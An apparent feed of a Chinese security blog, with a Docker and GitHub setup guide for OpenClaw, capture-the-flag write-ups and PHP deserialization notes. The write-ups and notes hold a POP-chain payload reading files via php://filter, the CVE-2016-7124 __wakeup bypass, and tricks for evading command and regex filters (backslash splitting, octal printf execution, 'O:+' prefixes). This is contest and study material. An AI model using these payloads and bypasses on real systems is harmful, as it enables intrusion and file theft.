Malpl3naInk Hexo https://blog.moling.ink/ All rights reserved 2026, Malpl3naInk ;) <![CDATA[Malpl3naInk> $ Permission Granted]]> 2026-03-24T07:16:31.687Z Malpl3naInk

看了一圈 Docker 安装 OpenClaw 的文章好像都是默认设置
正好搞了连接 Github 账号就记录一下

主机信息

  • 系统: Debian GNU/Linux 13 (trixie)
  • OpenClaw 代码目录: /data/openclaw/src
  • OpenClaw 数据目录: /data/openclaw/data
  • 模型提供商: Deepseek

目标

  • Docker 安装 OpenClaw
  • 更改数据保存位置
  • 通过 PAT 连接 Github 账号

安装 OpenClaw

下载 OpenClaw 代码库

1
git clone https://github.com/openclaw/openclaw.git src

切换到最新发行版

此处查看最新发行版

1
git checkout v2026.2.26

创建 .env 环境变量

1
2
3
4
5
6
7
8
9
10
11
12
13
# 自定义数据目录,按照实际情况修改
OPENCLAW_CONFIG_DIR=/data/openclaw/data
# 自定义工作空间,按照实际情况修改
OPENCLAW_WORKSPACE_DIR=/data/openclaw/data/workspace
OPENCLAW_GATEWAY_PORT=18789
OPENCLAW_BRIDGE_PORT=18790
OPENCLAW_GATEWAY_BIND=lan
OPENCLAW_GATEWAY_TOKEN=<随机生成的64位hex>
OPENCLAW_IMAGE=openclaw:local
# 持久化 gh 配置文件
OPENCLAW_EXTRA_MOUNTS=/data/openclaw/data/.config/gh:/home/node/.config/gh
OPENCLAW_HOME_VOLUME=
OPENCLAW_DOCKER_APT_PACKAGES=

Hex 随机生成

1
openssl rand -hex 32
1
head -c 32 /dev/urandom | xxd -p
1
od -An -N32 -tx1 /dev/urandom | tr -d ' \n'
环境变量说明
变量名说明默认值需要修改
OPENCLAW_CONFIG_DIR数据目录/home/<你的用户名>/.openclaw
OPENCLAW_WORKSPACE_DIR工作空间/home/<你的用户名>/.openclaw/workspace
OPENCLAW_GATEWAY_PORTWebUI 端口18789
OPENCLAW_BRIDGE_PORT18790
OPENCLAW_GATEWAY_BINDlan
OPENCLAW_GATEWAY_TOKEN<随机生成的64位hex>
OPENCLAW_IMAGEDocker 镜像名称openclaw:local
OPENCLAW_EXTRA_MOUNTSDocker 额外挂载的目录
OPENCLAW_HOME_VOLUME
OPENCLAW_DOCKER_APT_PACKAGES镜像构建时额外安装的apt包

构建 OpenClaw 镜像

1
docker build -t openclaw:local -f Dockerfile .

启动 OpenClaw 并进入设置向导

1
docker compose run --rm openclaw-cli onboard
设置向导

  • I understand this is personal-by-default and shared/multi-user use requires lock-down. Continue? (我理解这是默认个人使用,共享/多用户使用需要锁定设置。是否继续?)

    • Yes

  • Onboarding mode (引导模式)

    • Quick Start

  • Model/auth provider (模型提供商) - 对于 Deepseek, 使用 Custom Provider

    • Custom Provider

  • API Base URL

    • https://api.deepseek.com

  • How do you want to provide this API key? (何时填写 API Key)

    • Paste API key now

  • API Key (leave blank if not required)

    • <填写 API Key>

  • Endpoint compatibility (API 端点兼容性) - 对于 Deepseek, 使用 OpenAI 兼容 API

    • OpenAI-compatible

  • Model ID (模型 ID)

    • deepseek-chat

  • Verification successful. (显示即为验证成功)

  • Endpoint ID (命名 API 端点)

    • <自行命名>

  • Model alias (optional) (模型别名)

    • <非必填项>

  • Select channel (QuickStart) (设置与模型的对话通道) - 此处使用 Telegram Bot

    • Telegram (Bot API)

  • Enter Telegram bot token (输入机器人 Token)

    • <自行填写>

  • Telegram allowFrom (numeric sender id; @username resolves to id) (设置收信白名单)

    • <自行填写>

  • Configure skills now? (recommended) (现在配置 OpenClaw 功能)

    • Yes

  • Install missing skill dependencies (安装缺失的技能依赖项) - 点击空格进行选择/取消选择,回车确认

    • github

  • Show Homebrew install command? (显示 Homebrew 安装命令) - 在 Debian 中使用 apt 而不是 brew 安装

    • No

  • Install failed: github — brew not installed — Homebrew is not installed. (忽略,不需要安装 brew)

  • Set GOOGLE_PLACES_API_KEY for goplaces? (设置 Google Places API Key) - 此处不需要该功能

    • No

  • 跳过几个 API Key 配置

  • Enable hooks? (启用 Hook, 即 Telegram 的 / 命令)

    • <自行选择>

设置向导完成后,在 Control UIDashboard ready 部分会显示网页控制台的 URL 与 Token

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
◇  Dashboard ready ────────────────────────────────────────────────────────────────╮
│                                                                                  │
│  Dashboard link (with token):                                                    │
│  http://127.0.0.1:18789/#token=c01dbeef0000000000000000000000000000000000000000  │
│  Copy/paste this URL in a browser on this machine to control OpenClaw.           │
│  No GUI detected. Open from your computer:                                       │
│  ssh -N -L 18789:127.0.0.1:18789 user@<host>                                     │
│  Then open:                                                                      │
│  http://localhost:18789/                                                         │
│  http://localhost:18789/#token=c01dbeef0000000000000000000000000000000000000000  │
│  Docs:                                                                           │
│  https://docs.openclaw.ai/gateway/remote                                         │
│  https://docs.openclaw.ai/web/control-ui                                         │
│                                                                                  │
├──────────────────────────────────────────────────────────────────────────────────╯

修改 openclaw.json

编辑 $OPENCLAW_CONFIG_DIR/openclaw.json, 在先前的设定中为 /data/openclaw/data/openclaw.json

gateway 中添加以下内容

1
2
3
4
5
"controlUi": {
  "allowedOrigins": [
    "http://127.0.0.1:18789"
  ]
},

启动 OpenClaw Gateway

1
docker compose up -d openclaw-gateway

建立 SSH 端口映射隧道

官方文档

根据 OpenClaw 的默认安全设置,Control UI 只能从本地 127.0.0.1 访问

1
ssh -N -L 18789:127.0.0.1:18789 <用户名>@<主机 IP 地址>

访问 Control UI

访问先前获取的带 token 参数的 URL http://127.0.0.1:18789/#token=<Token>

如果一切正常,网页会显示 pairing required

安装 clawdock-helpers

clawdock-helpers 是一个用于快速管理 Docker 容器中 OpenClaw 实例的工具

安装 clawdock-helpers

1
2
3
4
5
6
# 下载 clawdock-helpers
mkdir -p ~/.clawdock && curl -sL https://raw.githubusercontent.com/openclaw/openclaw/main/scripts/shell-helpers/clawdock-helpers.sh -o ~/.clawdock/clawdock-helpers.sh
# 添加至环境变量
echo 'source ~/.clawdock/clawdock-helpers.sh' >> ~/.bashrc && source ~/.bashrc
# 显示 clawdock 帮助
clawdock-help

设置 clawdock-helpers 环境变量

~/.bashrc 添加指向 OpenClaw 源代码目录的环境变量 CLAWDOCK_DIR

1
export CLAWDOCK_DIR=/data/openclaw/src

设备认证

安装 clawdock-helpers 后即可使用该工具进行设备认证

1
2
# 列出所有设备
clawdock-devices

处理 Token 错误

如果出现如下错误:

1
2
3
🔍 Checking device pairings...
gateway connect failed: Error: unauthorized: gateway token mismatch (set gateway.remote.token to match gateway.auth.token)
[openclaw] CLI failed: Error: gateway closed (1008): unauthorized: gateway token mismatch (set gateway.remote.token to match gateway.auth.token)

运行以下命令修复 Token

1
clawdock-fix-token

批准配对请求

如果一切正常,则会输出类似内容

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
🔍 Checking device pairings...
Pending (1)
┌──────────────────────────────────────┬────────────────────────────────────┬──────────┬────────────┬────────┬────────┐
│ Request                              │ Device                             │ Role     │ IP         │ Age    │ Flags  │
├──────────────────────────────────────┼────────────────────────────────────┼──────────┼────────────┼────────┼────────┤
│ 71949123-52ef-417a-806f-a5c62501d321 │ 21f82c8f9434af86fa525cc9fe7c955541 │ operator │ 172.21.0.1 │ 1m ago │        │
│                                      │ 72e0d06235f042992f0cffebfb7c3d     │          │            │        │        │
└──────────────────────────────────────┴────────────────────────────────────┴──────────┴────────────┴────────┴────────┘
Paired (1)
┌─────────────────────────────┬────────────┬────────────────────────────────────────────────┬────────────┬────────────┐
│ Device                      │ Roles      │ Scopes                                         │ Tokens     │ IP         │
├─────────────────────────────┼────────────┼────────────────────────────────────────────────┼────────────┼────────────┤
│ f2f1d2d9b6155bf93693f19a631 │ operator   │ operator.admin, operator.read, operator.       │ operator   │            │
│ d5a211adf982a640a360f3b534d │            │ write, operator.approvals, operator.pairing    │            │            │
│ bdb3764a39                  │            │                                                │            │            │
└─────────────────────────────┴────────────┴────────────────────────────────────────────────┴────────────┴────────────┘

💡 To approve a pairing request:
   clawdock-approve <request-id>

使用 clawdock-approve 命令批准设备配对请求

1
clawdock-approve <Pending 表格显示的 request-id>

由于刷新了 Token,需要使用 clawdock-token 命令查看新的 Token

再次访问 http://127.0.0.1:18789/#token=<Token> 应用新 Token

配置 gh

在镜像中安装 gh

编辑 DockerFile,添加以下内容:

1
2
3
4
5
6
7
8
RUN curl -fsSL https://cli.github.com/packages/githubcli-archive-keyring.gpg \
    | gpg --dearmor -o /usr/share/keyrings/githubcli-archive-keyring.gpg && \
  echo "deb [arch=$(dpkg --print-architecture) signed-by=/usr/share/keyrings/githubcli-archive-keyring.gpg] https://cli.github.com/packages stable main" \
    > /etc/apt/sources.list.d/github-cli.list && \
  apt-get update && \
  DEBIAN_FRONTEND=noninteractive apt-get install -y --no-install-recommends gh && \
  apt-get clean && \
  rm -rf /var/lib/apt/lists/* /var/cache/apt/archives/*

添加后的文件应该类似

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
...
RUN if [ -n "$OPENCLAW_DOCKER_APT_PACKAGES" ]; then \
      apt-get update && \
      DEBIAN_FRONTEND=noninteractive apt-get install -y --no-install-recommends $OPENCLAW_DOCKER_APT_PACKAGES && \
      apt-get clean && \
      rm -rf /var/lib/apt/lists/* /var/cache/apt/archives/*; \
    fi

# Install gh
RUN curl -fsSL https://cli.github.com/packages/githubcli-archive-keyring.gpg \
    | gpg --dearmor -o /usr/share/keyrings/githubcli-archive-keyring.gpg && \
  echo "deb [arch=$(dpkg --print-architecture) signed-by=/usr/share/keyrings/githubcli-archive-keyring.gpg] https://cli.github.com/packages stable main" \
    > /etc/apt/sources.list.d/github-cli.list && \
  apt-get update && \
  DEBIAN_FRONTEND=noninteractive apt-get install -y --no-install-recommends gh && \
  apt-get clean && \
  rm -rf /var/lib/apt/lists/* /var/cache/apt/archives/*

COPY --chown=node:node package.json pnpm-lock.yaml pnpm-workspace.yaml .npmrc ./
COPY --chown=node:node ui/package.json ./ui/package.json
...

配置 GH_TOKEN

修改 docker-compose.yml,在 service.openclaw-gateway.environment 中添加一条 GH_TOKEN

修改后的 docker-compose.yml 大致如下

1
2
3
4
5
6
7
8
9
10
11
services:
  openclaw-gateway:
    image: ${OPENCLAW_IMAGE:-openclaw:local}
    environment:
      HOME: /home/node
      TERM: xterm-256color
      OPENCLAW_GATEWAY_TOKEN: ${OPENCLAW_GATEWAY_TOKEN}
      CLAUDE_AI_SESSION_KEY: ${CLAUDE_AI_SESSION_KEY}
      CLAUDE_WEB_SESSION_KEY: ${CLAUDE_WEB_SESSION_KEY}
      CLAUDE_WEB_COOKIE: ${CLAUDE_WEB_COOKIE}
      GH_TOKEN: ${SKILL_GH_TOKEN}

.env 中添加 Github Personal Access Token

]]> https://blog.moling.ink/articles/configure-openclaw-with-docker-and-github/ 2026-02-28T10:43:02.000Z 记录使用 Docker 从源码编译安装 OpenClaw、自定义数据目录、在镜像中集成 gh CLI,并通过 PAT 连接 Github 账号的完整配置流程。 使用Docker从源码编译安装OpenClaw并配置Github Skill 2026-03-24T07:16:31.687Z Malpl3naInk Web安全

Hellogate

默认网页抓包,在最下面发现网页源码

构造pop链 A->B->C 尝试查看index.php内容

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
<?php
class A {
    public $handle;
    public function triggerMethod() {
        echo "" . $this->handle;
    }
}
class B {
    public $worker;
    public function __toString() {
        return $this->worker->result;
    }
}
class C { 
public $cmd;
    public function __get($name) {
        echo file_get_contents($this->cmd);
    } 
} 
 
$c = new C(); 
$c->cmd = "php://filter/read=convert.base64-encode/resource=index.php"; 
$b = new B(); 
$b->worker = $c; 
$a = new A(); 
$a->handle = $b; 
$d = serialize($a); 
echo $d; 
?>

没有发现任何线索,直接读取flag文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
<?php
class A {
    public $handle;
    public function triggerMethod() {
        echo "" . $this->handle;
    }
}
class B {
    public $worker;
    public function __toString() {
        return $this->worker->result;
    }
}
class C {
    public $cmd;
    public function __get($name) {
        echo file_get_contents($this->cmd);
    }
}
 
$c = new C();
$c->cmd = "php://filter/read=convert.base64-encode/resource=/flag";
$b = new B();
$b->worker = $c;
$a = new A();
$a->handle = $b;
$d = serialize($a);
echo $d;
?>

解base64

密码学

ECDSA

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
from ecdsa import SigningKey, NIST521p
from hashlib import sha512
from Crypto.Util.number import long_to_bytes
import random
import binascii
import sys
digest_int = int.from_bytes(sha512(b"Welcome to this challenge!").digest(), "big")
curve_order = NIST521p.order
priv_int = digest_int % curve_order
priv_bytes = long_to_bytes(priv_int, 66)
sk = SigningKey.from_string(priv_bytes, curve=NIST521p)
vk = sk.verifying_key
f_pub = open("public.pem", "wb")
f_pub.write(vk.to_pem())
f_pub.close()

msgs = [b"message-" + bytes([i]) for i in range(60)]
sigs = []
def nonce(i):
    seed = sha512(b"bias" + bytes([i])).digest()
    k = int.from_bytes(seed, "big")
    return k

for i, msg in enumerate(msgs):
    k = nonce(i)
    sig = sk.sign(msg, k=k)
    sigs.append((binascii.hexlify(msg).decode(), binascii.hexlify(sig).decode()))

f_sig = open("signatures.txt", "w")
for m, s in sigs:
    f_sig.write("%s:%s\n" % (m, s))
f_sig.close()

from hashlib import sha512, md5

msg = b"Welcome to this challenge!"
digest = sha512(msg).digest()
priv_int = int.from_bytes(digest, "big")
flag_md5 = md5(str(priv_int).encode()).hexdigest()
print(f"flag{{{flag_md5}}}")

EzFlag

使用IDA 伪代码分析main 函数得出固定密码 V3ryStr0ngp@ssw0rd;else 块中 for 循环用于计算flag内容;每次循环后有sleep拖延运行时长;v11的数值在多次循环后会变成极大数

用 Python 复现函数 f() 发现计算结果每24个为一个循环,因此传入 f() 函数的 v11 可以通过取模24的方式减小计算量

使用IDA编辑代码,jmp跳过密码验证环节空出代码位置

重新组织字节码结构

在 f() 函数调用前对参数进行取模

删除sleep代码

应用编辑后运行

1
2
3
4
5
6
7
8
9
# f() 函数验证脚本 
a1 = 100
v5 = 0
v4 = 1
for i in range(a1):
    v2 = v4
    v4 = (v5 + v4) & 0xF
    v5 = v2
    print(v5, end=' ')

流量分析

SnakeBackdoor-1

过滤 http 找到最后一个 /admin/login

SnakeBackdoor-2

跟到攻击者的模板注入

SnakeBackdoor-3

跟到 Base64 和 zlib 后的 Payload ,写代码解密,同时知道加密算法是 RC4

1
2
3
4
5
6
7
8
9
10
11
12
13
import base64
import zlib

__ = '=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'
while True:
    try:
        b = base64.b64decode(__[::-1])
        e = zlib.decompress(b).decode()
        s = e.split("'")
        __ = s[1]
    except:
        print("'".join(s))
        break

SnakeBackdoor-4

跟到攻击者将 shell 重命名为了 python3.13

AI安全

The Silent Heist

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
import pandas as pd
import numpy as np
import socket
import time

def solve():
    df = pd.read_csv('misc\public_ledger.csv')
    df.columns = [f'feat_{i}' for i in range(20)]
    means = df.mean()
    cov_matrix = df.cov()

    shrink_factor = 0.2
    num_to_generate = 7000
    
    samples = np.random.multivariate_normal(means, cov_matrix * shrink_factor, num_to_generate)

    dist = np.linalg.norm(samples - means.values, axis=1)
    safe_indices = np.argsort(dist)[:6200]
    final_samples = samples[safe_indices]
    
    fake_df = pd.DataFrame(final_samples, columns=df.columns)
    fake_df[fake_df < 0] = 0

    payload = fake_df.to_csv(index=False) + "\nEOF\n"

    host = "39.105.197.135"
    port = 22541
    
    try:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(60)
            print(f"连接 {host}:{port}...")
            s.connect((host, port))
            
            time.sleep(1)
            try:
                print(s.recv(1024).decode(errors='ignore'))
            except:
                pass
            s.sendall(payload.encode())
            
            response = ""
            while True:
                chunk = s.recv(4096).decode(errors='ignore')
                if not chunk: break
                response += chunk
                print(chunk, end="", flush=True)
                if "flag{" in response.lower():
                    print("\n获取 Flag")
                    break
                if "ALARM" in response:
                    print("\n错误")
                    break
    except Exception as e:
        print(f"\n[!] 连接异常: {e}")

if __name__ == "__main__":
    solve()
]]> https://blog.moling.ink/articles/2025-ccb-ciscn/ 2025-12-28T18:48:10.000Z 第十九届全国大学生信息安全竞赛创新实践能力赛暨第三届长城杯初赛 WriteUp,涵盖 Web 安全 PHP 反序列化、密码学 RSA 与 AES 解密、逆向工程 IDA 分析与反调试、流量分析 Wireshark 数据包取证、AI 安全多模态检测等题目的详细解题思路 第十九届全国大学生信息安全竞赛(创新实践能力赛)暨第三届"长城杯"网数智安全大赛(防护赛)初赛WP 2026-03-24T07:16:31.679Z Malpl3naInk MISC

Torrent!

打开种子文件找到SHA1 Hash

在线解密拿到明文,MD4 Hash

哈基米

文件属性找到Base64,文件尾找到替换表

CRYPTO

Empire

Empire(皇帝) / Ceasar凯撒(大帝)

SEA

直接爆

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
from Crypto.Cipher import AES
import base64
# from FLAG  import flag

def pkcs7_pad(data):
    block = 16
    padding_len = block - len(data) % block
    return data + bytes([padding_len]) * padding_len

key_l3 = [65, 65, 65]

def main():
    while key_l3[0] != 0x7e:
        key_l3[2] += 1
        if (key_l3[2] > 0x7e):
            key_l3[2] = 65
            key_l3[1] += 1
        if (key_l3[1] > 0x7e):
            key_l3[1] = 65
            key_l3[0] += 1
        key = "ZJTIE-CTF-IS-" + chr(key_l3[0]) + chr(key_l3[1]) + chr(key_l3[2])
        print(key)
        cipher = AES.new(key.encode(), AES.MODE_ECB)
        encode_text = base64.b64decode('patCICFf4hK+vmHQaDhaqn+j+/dHGsfkoky0TUDjSsVOe/PQcEgznf9F65BgH5Ek')
        try:
            plain_text = cipher.decrypt(encode_text).decode()

            print(plain_text)
            break
        except:
            continue
if __name__ == "__main__":
    main()

WEB

CET4

AI改变生活(

饼干大亨

DevTools本地替换得到Tip

Cookie找到myflag

全家桶

REVERSE

ezRE

IDA反编译找到比较相关代码和处理代码

1
2
3
4
5
6
7
8
text = b'ZKVJA~6e::?;;9#9qw\"> $$$5!x)(0*-FG\x17'
_hex = 0x571C4B11101D4246
b = _hex.to_bytes(8, byteorder='little')
text += b

for i in range(len(text)):
    print(chr(text[i] ^ i), end='')
print()

MOBILE

BabyAPK

Jadx打开,发现DES加密和异或操作,key和enc在strings.xml

直接解密

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
public static byte[] hexToBytes(String hex) {
    int len = hex.length();
    if ((len & 1) != 0) {
        throw new IllegalArgumentException("Invalid hex length");
    }

    byte[] out = new byte[len / 2];
    for (int i = 0; i < len; i += 2) {
        int hi = Character.digit(hex.charAt(i), 16);
        int lo = Character.digit(hex.charAt(i + 1), 16);
        if (hi < 0 || lo < 0) {
            throw new IllegalArgumentException("Invalid hex char");
        }
        out[i / 2] = (byte) ((hi << 4) | lo);
    }
    return out;
}
String hex = "8b54a1f1ec35e82b9aa5bbb7d95949370127be0a147e653f3f950fdc1e4ec24cc5b87570cd60cab8";
String key = "zjtienb!";
try {
    byte[] cipherBytes = hexToBytes(hex);
    byte[] keyBytes = key.getBytes("UTF-8");
    SecretKey secretKey = new SecretKeySpec(keyBytes, "DES");
    Cipher cipher = Cipher.getInstance("DES/ECB/PKCS5Padding");
    cipher.init(Cipher.DECRYPT_MODE, secretKey);
    byte[] plainBytes = cipher.doFinal(cipherBytes);
    String result =  new String(plainBytes, "UTF-8");

    StringBuilder decodedPart = new StringBuilder();
    for (int i = 0; i < result.length(); i++) {
        decodedPart.append((char) (result.charAt(i) ^ '\t'));
    }
    Log.d("DES", decodedPart.toString());
} catch (Exception e) {
    throw new RuntimeException(e);
}
]]> https://blog.moling.ink/articles/2025-1st-zjtie-netsec/ 2025-12-13T17:03:13.000Z 2025 年第一届浙江经贸职业技术学院经院杯网络安全竞赛 WriteUp,包含 Misc 种子文件分析与 Base64 变表解密、Crypto 凯撒密码与 AES 密钥爆破、Web Cookie 伪造与前端绕过、Reverse IDA 逆向分析、Mobile Android APK 逆向 DES 解密等题目的完整解题过程 2025 第一届 "经院杯" 网络安全竞赛 WP 2026-03-24T07:16:31.676Z Malpl3naInk __wakeup()绕过

CVE-2016-7124

适用于 PHP5 < 5.6.25 | PHP7 < 7.0.10

具体表现为当序列化后字符串中表示对象中属性个数的数值大于实际属性数量时会跳过__wakeup()的执行

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
<?php
class Demo { 
    public $file = 'index.php';
    public function __construct($file) { 
        echo "construct\n";
    }
    function __destruct() { 
        echo "destruct\n";
    }
    function __wakeup() { 
        echo "wakeup\n";
    } 
}
unserialize('O:4:"Demo":1:{s:4:"file";s:9:"index.php";}');
?>
1
2
3
E:\>php unserialize.php
wakeup
destruct

修改为
unserialize(‘O:4:”Demo”:2:{s:4:”file”;s:9:”index.php”;}’);

1
2
E:\>php unserialize.php
destruct

正则绕过

反斜杠分割命令

1
/(cat|flag|tac|php|ls)/

该正则用于匹配某些特定命令

在命令中添加反斜杠,命令仍然能够被正确识别

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌──(Malpl3naInk㉿WIN-U10PUEP8DSD)-[~/CTF/temp]
└─$ cat 01
001

┌──(Malpl3naInk㉿WIN-U10PUEP8DSD)-[~/CTF/temp]
└─$ c\at 01 # 在命令中添加反斜杠
001

┌──(Malpl3naInk㉿WIN-U10PUEP8DSD)-[~/CTF/temp]
└─$ c/at 01 # 在命令中添加正斜杠(无法识别)
-bash: c/at: No such file or directory

┌──(Malpl3naInk㉿WIN-U10PUEP8DSD)-[~/CTF/temp]
└─$ c\at 0\1 # 在命令与参数中都添加反斜杠
001

内敛执行输出

`<command>`${<command>} 中命令的输出作为输入

1
2
3
4
5
6
7
8
9
10
11
┌──(Malpl3naInk㉿WIN-U10PUEP8DSD)-[~/CTF/temp]
└─$ ls
01

┌──(Malpl3naInk㉿WIN-U10PUEP8DSD)-[~/CTF/temp]
└─$ cat 01
001

┌──(Malpl3naInk㉿WIN-U10PUEP8DSD)-[~/CTF/temp]
└─$ cat `ls` # 将 ls 命令获取的文件名 01 作为参数传入 cat 命令
001

由示例可看到,命令 `ls` 的输出文件名 01 作为输入传入 cat 命令,结合为命令 cat 01

此外,内敛执行还可以使用 printf 八进制命令的方式执行命令

1
2
3
4
5
6
7
┌──(Malpl3naInk㉿WIN-U10PUEP8DSD)-[~/CTF/temp]
└─$ `printf "\154\163"` # ls 的八进制
01

┌──(Malpl3naInk㉿WIN-U10PUEP8DSD)-[~/CTF/temp]
└─$ `printf "\143\141\164\40\60\61"` # cat 01 的八进制
001

特征正则绕过

1
/^O:\d+/

该正则会匹配序列化字符串开头是否为对象字符串 O:<数字> 开头

将序列化字符串开头改为 O:+<数字> 可以在不影响识别的情况下绕过正则匹配

]]> https://blog.moling.ink/articles/php-unserialize-series/ 2025-11-16T18:42:42.000Z 系统记录 PHP 反序列化漏洞利用技巧,包括 CVE-2016-7124 __wakeup() 绕过方法、命令执行中的反斜杠绕过、内敛执行输出及序列化字符串特征正则绕过等实战技巧 一些 PHP 反序列化笔记 2026-03-24T07:16:31.687Z Malpl3naInk WEB

咋输不进去捏

F12 直接看源码看到条件

view-source

Burp 抓包修改输入得到 flag

burp_flag

MISC

easySteg0

在给图片的 属性 => 详细信息 找到 Base64 替换表

base64_table

